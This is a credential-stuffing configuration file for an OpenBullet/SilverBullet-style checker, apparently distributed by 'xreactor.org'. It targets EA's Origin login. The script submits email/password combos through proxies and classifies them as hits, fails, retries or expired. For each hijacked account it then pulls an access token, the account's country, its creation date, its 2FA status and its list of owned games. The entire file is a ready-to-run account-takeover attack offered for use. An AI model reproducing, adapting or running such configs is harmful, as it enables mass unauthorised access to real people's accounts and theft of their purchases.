[SETTINGS]
{
  "Name": "origin | xreactor.org",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-02-04T13:07:07.9094984+02:00",
  "AdditionalInfo": "for more configs : xreactor.org",
  "RequiredPlugins": [],
  "Author": "@uzzzul | @xreactor_team",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "origin(paid)",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#GET REQUEST GET "https://signin.ea.com/p/originX/login?execution=e1026126210s1&initref=https%3A%2F%2Faccounts.ea.com%3A443%2Fconnect%2Fauth%3Fdisplay%3DoriginXWeb%252Flogin%26response_type%3Dcode%26release_type%3Dprod%26redirect_uri%3Dhttps%253A%252F%252Fwww.origin.com%252Fviews%252Flogin.html%26locale%3Den_US%26client_id%3DORIGIN_SPA_ID" 
  
  HEADER "Host: signin.ea.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Sec-GPC: 1" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Referer: https://signin.ea.com/p/originX/login?execution=e1026126210s1&initref=https%3A%2F%2Faccounts.ea.com%3A443%2Fconnect%2Fauth%3Fdisplay%3DoriginXWeb%252Flogin%26response_type%3Dcode%26release_type%3Dprod%26redirect_uri%3Dhttps%253A%252F%252Fwww.origin.com%252Fviews%252Flogin.html%26locale%3Den_US%26client_id%3DORIGIN_SPA_ID" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 

#LOGIN REQUEST POST "<HEADERS(selflocation)>" 
  CONTENT "email=<USER>&password=<PASS>&_eventId=submit&cid=2uHUO2RcIzHw9FXNZp2U32GvomPbE9Te&showAgeUp=true&thirdPartyCaptchaResponse=&_rememberMe=on&rememberMe=on" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: signin.ea.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Content-Length: 176" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Origin: https://signin.ea.com" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Sec-GPC: 1" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Referer: https://signin.ea.com/p/originX/login?execution=e1026126210s1&initref=https%3A%2F%2Faccounts.ea.com%3A443%2Fconnect%2Fauth%3Fdisplay%3DoriginXWeb%252Flogin%26response_type%3Dcode%26release_type%3Dprod%26redirect_uri%3Dhttps%253A%252F%252Fwww.origin.com%252Fviews%252Flogin.html%26locale%3Den_US%26client_id%3DORIGIN_SPA_ID" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 

#HITS&FAILS KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Email address is invalid" 
    KEY "Your credentials are incorrect or have expired. Please try again or reset your password." 
  KEYCHAIN Retry OR 
    KEY "Are you a human" 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "Your account has been disabled" 
  KEYCHAIN Success OR 
    KEY "<COOKIES{*}>" Contains "webun" 

#FID PARSE "<SOURCE>" LR "fid=" "\";" -> VAR "fid" 

#Code REQUEST GET "https://accounts.ea.com/connect/auth?display=originXWeb%2Flogin&response_type=code&release_type=prod&redirect_uri=https%3A%2F%2Fwww.origin.com%2Fviews%2Flogin.html&locale=en_US&client_id=ORIGIN_SPA_ID&fid=<fid>" ReadResponseSource=FALSE 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#get_tk REQUEST GET "https://accounts.ea.com/connect/auth?client_id=ORIGIN_JS_SDK&response_type=token&redirect_uri=nucleus:rest&prompt=none&release_type=prod" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#tk PARSE "<SOURCE>" LR "access_token\":\"" "\"," -> VAR "tk" 

#Info REQUEST GET "https://gateway.ea.com/proxy/identity/pids/me" 
  
  HEADER "Host: gateway.ea.com" 
  HEADER "Connection: keep-alive" 
  HEADER "X-Include-UnderAge: true" 
  HEADER "Authorization: Bearer <tk>" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"96\", \"Google Chrome\";v=\"96\"" 
  HEADER "X-Extended-Pids: true" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://www.origin.com" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://www.origin.com/" 

#Country PARSE "<SOURCE>" LR "country\" : \"" "\"," CreateEmpty=FALSE -> CAP "Country" 

#Date_Created PARSE "<SOURCE>" LR "dateCreated\" : \"" "\"," CreateEmpty=FALSE -> CAP "Date Created" "" "=" 

#PId PARSE "<SOURCE>" LR "\"pidId\" : " "," -> VAR "pid" 

#2FA PARSE "<SOURCE>" LR "tfaEnabled\" : " "}" CreateEmpty=FALSE -> CAP "2FA" 

#2FA KEYCHECK 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "<2FA>" Contains "true" 
  KEYCHAIN Success OR 
    KEY "<2FA>" Contains "false" 

#Games REQUEST GET "https://api4.origin.com/ecommerce2/consolidatedentitlements/<pid>?machine_hash=1" 
  
  HEADER "Host: api4.origin.com" 
  HEADER "Connection: keep-alive" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"96\", \"Google Chrome\";v=\"96\"" 
  HEADER "Accept: application/vnd.origin.v3+json; x-cache/force-write" 
  HEADER "AuthToken: <tk>" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Origin: https://www.origin.com" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://www.origin.com/" 
  HEADER "Accept-Language: en-US,en;q=0.9" 

#Games PARSE "<SOURCE>" LR "offerPath\" : \"/" "\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "Games" 

#author FUNCTION Constant "@uzzzul | @xreactor_team" -> CAP "configby" 

